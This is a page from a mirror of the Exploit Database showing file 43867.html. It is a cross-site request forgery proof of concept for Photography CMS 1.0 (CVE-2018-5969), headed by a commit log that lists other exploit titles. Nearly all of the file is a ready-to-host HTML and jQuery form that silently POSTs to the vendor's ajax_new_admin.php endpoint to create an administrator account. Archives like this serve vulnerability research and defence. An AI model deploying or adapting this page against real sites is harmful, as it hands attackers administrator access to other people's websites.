bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/43867.html
Offensive Security a02c2710c9 DB: 2018-01-24 
15 changes to exploits/shellcodes

MixPad 5.00 - Buffer Overflow
RAVPower 2.000.056 - Memory Disclosure

HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation
CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection
NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download
LiveCRM SaaS Cloud 1.0 - SQL Injection
Affiligator 2.1.0 - SQL Injection
RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin)
Easy Car Script 2014 - SQL Injection
Wchat 1.5 - SQL Injection
Zechat 1.5 - SQL Injection
Tumder 2.1 - SQL Injection
Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
Quickad 4.0 - SQL Injection
Flexible Poll 1.2 - SQL Injection
2018-01-24 05:01:58 +00:00

58 lines
No EOL
1.5 KiB
HTML
Raw Blame History

<!--
# # # # #
# Exploit Title: Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://ronnieswietek.com/
# Software Link: https://codecanyon.net/item/client-photo-studio-photography-cms/1191688
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5969
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
# 1)
-->
<html>
<body>
<script src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
<h2>New Admin</h2>
<div class="efe">
<form method="post" onSubmit="return false">
<label for="username">Username:</label>
<input id="username" type="text"><br><br>
<label for="password1">Password:</label>
<input id="password1" type="password"><br><br>
<label for="password2">Confirm Password:</label>
<input id="password2" type="password"><br><br>
<label for="email">Email:</label>
<input id="email" type="text"><br><br>
<input id="ekleabi" value="Ver Ayari" type="submit">
</form>
</div>
<script type="text/javascript">
$("#ekleabi").live('click',function()
{
$.ajax({
type: "POST",
url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajax_new_admin.php",
data:{
username:$(".efe #username").val(),
password1:$(".efe #password1").val(),
password2:$(".efe #password2").val(),
email:$(".efe #email").val()
}
});
});
</script>
</body>
</html>
Reference in a new issue View git blame Copy permalink